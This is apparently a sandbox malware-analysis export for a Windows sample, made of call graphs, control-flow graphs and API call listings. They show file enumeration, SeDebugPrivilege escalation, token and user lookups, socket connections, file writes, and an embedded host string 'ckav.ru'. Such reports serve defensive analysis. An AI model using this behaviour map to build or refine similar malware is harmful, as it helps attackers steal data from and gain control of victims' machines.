10054->10055 10056 402bab 2 API calls 10054->10056 10057 40ef7c 10055->10057 10058 402bab 2 API calls 10055->10058 10056->10055 10057->10050 10059 402bab 2 API calls 10057->10059 10058->10057 10059->10050 10060 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10060->10062 10061 402bab GetProcessHeap HeapFree 10061->10062 10062->10049 10062->10050 10062->10052 10062->10053 10062->10054 10062->10060 10062->10061 10063 40ef98 10064 404c4e 6 API calls 10063->10064 10065 40efb6 10064->10065 10077 40f02a 10065->10077 10078 40f054 10065->10078 10068 404bee 7 API calls 10069 40efda 10068->10069 10070 404bee 7 API calls 10069->10070 10071 40efe9 10070->10071 10072 405872 4 API calls 10071->10072 10071->10077 10073 40f008 10072->10073 10074 405872 4 API calls 10073->10074 10075 40f01a 10074->10075 10076 405872 4 API calls 10075->10076 10076->10077 10079 40f064 10078->10079 10080 402b7c 2 API calls 10079->10080 10082 40f072 10080->10082 10081 40efca 10081->10068 10082->10081 10084 405ecd 10082->10084 10085 4059b8 4 API calls 10084->10085 10086 405edf 10085->10086 10086->10082 9418 410c98 9419 41219c 15 API calls 9418->9419 9420 410ca8 9419->9420 9421 41219c 15 API calls 9420->9421 9422 410cb5 9421->9422 9423 412093 13 API calls 9422->9423 9424 410cc9 9423->9424 10156 41249c 10157 4056bf 2 API calls 10156->10157 10158 4124aa 10157->10158 10159 4057df 14 API calls 10158->10159 10164 4124ce 10158->10164 10160 4124be 10159->10160 10161 413aca 4 API calls 10160->10161 10162 4124c8 10161->10162 10163 405695 2 API calls 10162->10163 10163->10164 9428 40f49e 9429 40f4b6 14 API calls 9428->9429 9430 40f4a8 9429->9430 9431 40929e 9432 413b28 7 API calls 9431->9432 9433 4092a4 9432->9433 9434 405b6f 6 API calls 9433->9434 9435 4092af 9434->9435 9436 409408 18 API calls 9435->9436 9439 4092c5 9435->9439 9437 4092bf 9436->9437 9438 402bab 2 API calls 9437->9438 9438->9439 10265 407fa4 10266 407fb7 10265->10266 10267 402b7c 2 API calls 10266->10267 10268 407fee 10266->10268 10269 40800d 10267->10269 10269->10268 10270 4037be 4 API calls 10269->10270 10271 40803c 10270->10271 10272 402bab 2 API calls 10271->10272 10272->10268 9473 4090aa 9474 404b22 7 API calls 9473->9474 9475 4090c1 9474->9475 9476 4090d8 9475->9476 9477 409408 18 API calls 9475->9477 9478 404b22 7 API calls 9476->9478 9479 4090d2 9477->9479 9480 4090eb 9478->9480 9481 402bab 2 API calls 9479->9481 9482 408c4d 17 API calls 9480->9482 9485 409104 9480->9485 9481->9476 9483 4090fe 9482->9483 9484 402bab 2 API calls 9483->9484 9484->9485 9492 409cae 9507 404b79 9492->9507 9494 409cc5 9496 405b6f 6 API calls 9494->9496 9497 409d2f 9494->9497 9499 409d27 9494->9499 9495 402bab 2 API calls 9495->9497 9498 409cec 9496->9498 9498->9499 9500 404b79 7 API calls 9498->9500 9499->9495 9501 409d05 9500->9501 9502 409d1e 9501->9502 9503 408c4d 17 API calls 9501->9503 9504 402bab 2 API calls 9502->9504 9505 409d18 9503->9505 9504->9499 9506 402bab 2 API calls 9505->9506 9506->9502 9508 404b22 7 API calls 9507->9508 9509 404b8a 9508->9509 9509->9494 10316 411fb3 10317 405b6f 6 API calls 10316->10317 10319 412013 10317->10319 10318 412075 10319->10318 10334 41206a 10319->10334 10335 411a8d 10319->10335 10321 402bab 2 API calls 10321->10318 10323 4056bf 2 API calls 10324 41203d 10323->10324 10325 405872 4 API calls 10324->10325 10326 41204a 10325->10326 10327 413aca 4 API calls 10326->10327 10328 412054 10327->10328 10329 405695 2 API calls 10328->10329 10330 41205a 10329->10330 10331 413a58 14 API calls 10330->10331 10332 412064 10331->10332 10333 402bab 2 API calls 10332->10333 10333->10334 10334->10321 10336 402b7c 2 API calls 10335->10336 10337 411aa3 10336->10337 10345 411f05 10337->10345 10358 404ada 10337->10358 10340 404ada 4 API calls 10341 411cad 10340->10341 10342 411f0c 10341->10342 10344 411cc0 10341->10344 10343 402bab 2 API calls 10342->10343 10343->10345 10361 405eb6 10344->10361 10345->10323 10345->10334 10347 411d3c 10348 4031e5 4 API calls 10347->10348 10356 411d7b 10348->10356 10349 411ea6 10350 4031e5 4 API calls 10349->10350 10351 411eb5 10350->10351 10352 4031e5 4 API calls 10351->10352 10353 411ed6 10352->10353 10354 405eb6 4 API calls 10353->10354 10354->10345 10355 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10355->10356 10356->10349 10356->10355 10357 405eb6 4 API calls 10356->10357 10357->10356 10359 4031e5 4 API calls 10358->10359 10360 404afd 10359->10360 10360->10340 10362 405998 4 API calls 10361->10362 10363 405ec8 10362->10363 10363->10347 9539 40f6b8 9540 41219c 15 API calls 9539->9540 9541 40f6c7 9540->9541 9542 41219c 15 API calls 9541->9542 9543 40f6d5 9542->9543 9544 41219c 15 API calls 9543->9544 9545 40f6df 9544->9545 9564 40d6bd 9565 4056bf 2 API calls 9564->9565 9566 40d6c9 9565->9566 9577 404cbf 9566->9577 9569 404cbf 9 API calls 9570 40d6f4 9569->9570 9571 404cbf 9 API calls 9570->9571 9572 40d702 9571->9572 9573 413aca 4 API calls 9572->9573 9574 40d711 9573->9574 9575 405695 2 API calls 9574->9575 9576 40d71f 9575->9576 9578 402b7c 2 API calls 9577->9578 9579 404ccd 9578->9579 9580 404ddc 9579->9580 9581 404b8f 5 API calls 9579->9581 9580->9569 9582 404ce4 9581->9582 9583 404dd4 9582->9583 9584 402b7c 2 API calls 9582->9584 9585 402bab 2 API calls 9583->9585 9591 404d04 9584->9591 9585->9580 9586 404dcc 9587 404a39 5 API calls 9586->9587 9587->9583 9588 404dc6 9589 402bab 2 API calls 9588->9589 9589->9586 9590 402b7c 2 API calls 9590->9591 9591->9586 9591->9588 9591->9590 9592 404b8f 5 API calls 9591->9592 9593 402bab GetProcessHeap HeapFree 9591->9593 9594 404a39 5 API calls 9591->9594 9595 405b6f 6 API calls 9591->9595 9596 404cbf 9 API calls 9591->9596 9598 40d726 9591->9598 9592->9591 9593->9591 9594->9591 9595->9591 9596->9591 9614 404bee 9598->9614 9601 405872 4 API calls 9604 40d761 9601->9604 9602 404bee 7 API calls 9602->9604 9603 405872 4 API calls 9603->9604 9604->9602 9604->9603 9606 40d971 9604->9606 9607 405781 4 API calls 9606->9607 9611 40d9bb 9606->9611 9622 404ba7 9606->9622 9607->9606 9609 405781 4 API calls 9609->9611 9611->9609 9612 405872 4 API calls 9611->9612 9613 40db63 9611->9613 9625 404c4e 9611->9625 9632 4037be 9611->9632 9612->9611 9613->9591 9615 402b7c 2 API calls 9614->9615 9616 404bff 9615->9616 9617 4031e5 4 API calls 9616->9617 9619 404c3b 9616->9619 9618 404c28 SHQueryValueExW 9617->9618 9618->9619 9620 404c3f 9618->9620 9619->9601 9619->9613 9621 402bab 2 API calls 9620->9621 9621->9619 9623 4031e5 4 API calls 9622->9623 9624 404bca 9623->9624 9624->9606 9626 402b7c 2 API calls 9625->9626 9627 404c60 9626->9627 9628 404ca4 9627->9628 9629 4031e5 4 API calls 9627->9629 9628->9611 9630 404c8d 9629->9630 9630->9628 9631 402bab 2 API calls 9630->9631 9631->9628 9633 4031e5 4 API calls 9632->9633 9634 4037e2 9633->9634 9635 40382b 9634->9635 9636 402b7c 2 API calls 9634->9636 9635->9611 9637 403802 9636->9637 9638 403832 9637->9638 9640 403809 9637->9640 9639 4036a3 4 API calls 9638->9639 9639->9635 9641 4036a3 4 API calls 9640->9641 9641->9635 9642 40f0bf 9643 4056bf 2 API calls 9642->9643 9644 40f0c9 9643->9644 9645 40f115 9644->9645 9646 404cbf 9 API calls 9644->9646 9647 41219c 15 API calls 9645->9647 9648 40f0ed 9646->9648 9649 40f128 9647->9649 9650 404cbf 9 API calls 9648->9650 9651 40f0fb 9650->9651 9652 413aca 4 API calls 9651->9652 9653 40f10a 9652->9653 9654 405695 2 API calls 9653->9654 9654->9645

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 296 403d74-403d90 call 4067c4 299 403d96-403da9 call 405b6f 296->299 300 403ea9-403ec0 call 405b6f 296->300 305 403ea6-403ea8 299->305 306 403daf-403dcb call 4031e5 FindFirstFileW 299->306 307 403f95 300->307 308 403ec6-403ee2 call 4031e5 FindFirstFileW 300->308 305->300 314 403dd1-403dd8 306->314 315 403e9d-403ea4 call 402bab 306->315 311 403f97-403f9d 307->311 316 403ee8-403ef8 call 405d24 308->316 317 403f8e-403f94 call 402bab 308->317 319 403e75-403e90 call 4031e5 FindNextFileW 314->319 320 403dde-403de2 314->320 315->305 332 403f03-403f0a 316->332 333 403efa-403f01 316->333 317->307 319->314 338 403e96-403e97 call 403bef 319->338 324 403e12-403e22 call 405d24 320->324 325 403de4-403df9 call 405eff 320->325 341 403e30-403e4c call 405b6f 324->341 342 403e24-403e2e 324->342 325->319 344 403dfb-403e10 call 405eff 325->344 334 403f12-403f2d call 405b6f 332->334 335 403f0c-403f10 332->335 333->332 339 403f41-403f5c call 4031e5 FindNextFileW 333->339 334->339 351 403f2f-403f33 334->351 335->334 335->339 346 403e9c 338->346 353 403f87-403f88 call 403bef 339->353 354 403f5e-403f61 339->354 341->319 358 403e4e-403e6f call 403d74 call 402bab 341->358 342->319 342->341 344->319 344->324 346->315 356 403f75-403f85 call 402bab call 403bef 351->356 357 403f35-403f40 call 402bab 351->357 362 403f8d 353->362 354->316 356->311 357->339 358->319 372 403f63-403f73 call 402bab call 403bef 358->372 362->317 372->311
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$FirstNext
                                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                                  • API String ID: 1690352074-2009209621
                                                  • Opcode ID: ce1aa3e376eaa67b233d40deefcf11ef12cbb06c2f81313b05abad007ffde034
                                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                  • Opcode Fuzzy Hash: ce1aa3e376eaa67b233d40deefcf11ef12cbb06c2f81313b05abad007ffde034
                                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 3615134276-2896544425
                                                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcess
                                                  • String ID:
                                                  • API String ID: 1357844191-0
                                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                  • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                                  • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 377 4061c3-4061f2 call 402bf2 call 4031e5 383 4061f4-4061ff GetLastError 377->383 384 40622a-40623b call 402b7c 377->384 385 406201-406203 383->385 386 406208-406228 call 4060ac call 4031e5 383->386 392 40624c-406258 call 402b7c 384->392 393 40623d-406249 call 40338c 384->393 388 406329-40632e 385->388 386->384 386->385 400 406269-406290 call 4031e5 GetTokenInformation 392->400 401 40625a-406266 call 40338c 392->401 393->392 407 406292-4062a0 call 402b7c 400->407 408 4062fe-406302 400->408 401->400 407->408 419 4062a2-4062b9 call 406086 407->419 409 406304-406307 call 403c40 408->409 410 40630d-40630f 408->410 418 40630c 409->418 414 406311-406317 call 402bab 410->414 415 406318-40631e 410->415 414->415 416 406320-406326 call 402bab 415->416 417 406327 415->417 416->417 417->388 418->410 426 4062f5-4062fd call 402bab 419->426 427 4062bb-4062e4 call 4031e5 LookupAccountSidW 419->427 426->408 427->426 432 4062e6-4062f3 call 405b6f 427->432 432->426
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                  • _wmemset.LIBCMT ref: 00406244
                                                  • _wmemset.LIBCMT ref: 00406261
                                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                  • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wmemset$AccountErrorInformationLastLookupToken
                                                  • String ID: IDA$IDA
                                                  • API String ID: 3235442692-2020647798
                                                  • Opcode ID: 1c08e37961a647aa104d4009945586a48361f9d4dbdfa32f9cccef29c78ec135
                                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                  • Opcode Fuzzy Hash: 1c08e37961a647aa104d4009945586a48361f9d4dbdfa32f9cccef29c78ec135
                                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 763 404e17-404e57 getaddrinfo 764 404e59-404e5b 763->764 765 404e5d-404e84 call 402b7c socket 763->765 766 404ecf-404ed3 764->766 769 404e86-404e96 call 402bab freeaddrinfo 765->769 770 404e98-404ea7 connect 765->770 778 404ec7-404ec9 769->778 771 404eb3-404ebe freeaddrinfo 770->771 772 404ea9-404eb1 call 404de5 770->772 776 404ec0-404ec6 call 402bab 771->776 777 404ecb 771->777 772->771 776->778 781 404ecd-404ece 777->781 778->781 781->766
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: freeaddrinfogetaddrinfosocket
                                                  • String ID:
                                                  • API String ID: 2479546573-0
                                                  • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                  • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 783 4040bb-4040f2 call 4031e5 CreateFileW 786 4040f8-404111 call 4031e5 783->786 787 40418d-404190 783->787 797 404113-404119 786->797 798 40417a 786->798 788 404192-4041a7 call 403c90 787->788 789 404184 787->789 788->789 796 4041a9-4041b8 call 403c59 788->796 791 404186-40418c 789->791 806 4041ba-4041d8 call 4040bb call 403d44 796->806 807 4041db-4041e4 call 402bab 796->807 797->798 801 40411b-404120 797->801 800 40417d-40417e call 403c40 798->800 808 404183 800->808 804 404122 801->804 805 404124-404140 call 4031e5 VirtualAlloc 801->805 804->805 805->798 816 404142-40415e call 4031e5 ReadFile 805->816 806->807 807->791 808->789 816->800 820 404160-404178 call 4031e5 816->820 820->800
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AllocCreateReadVirtual
                                                  • String ID: .tmp
                                                  • API String ID: 3585551309-2986845003
                                                  • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                  • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                  • GetLastError.KERNEL32 ref: 0041399E
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Error$CreateLastModeMutex
                                                  • String ID:
                                                  • API String ID: 3448925889-0
                                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreatePointerWrite
                                                  • String ID:
                                                  • API String ID: 3672724799-0
                                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                                  • String ID: ckav.ru
                                                  • API String ID: 2915393847-2696028687
                                                  • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                  • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • _wmemset.LIBCMT ref: 0040634F
                                                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateNameProcessUser_wmemset
                                                  • String ID: CA
                                                  • API String ID: 2078537776-1052703068
                                                  • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                  • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                  APIs
                                                  • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Path
                                                  • String ID: 5,A
                                                  • API String ID: 2875597873-3842761921
                                                  • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                  • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                                                  • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                  • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                                                  APIs
                                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InformationToken
                                                  • String ID: IDA
                                                  • API String ID: 4114910276-365204570
                                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                  APIs
                                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_400000_wininit.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: s1@
                                                  • API String ID: 190572456-427247929
                                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                  APIs
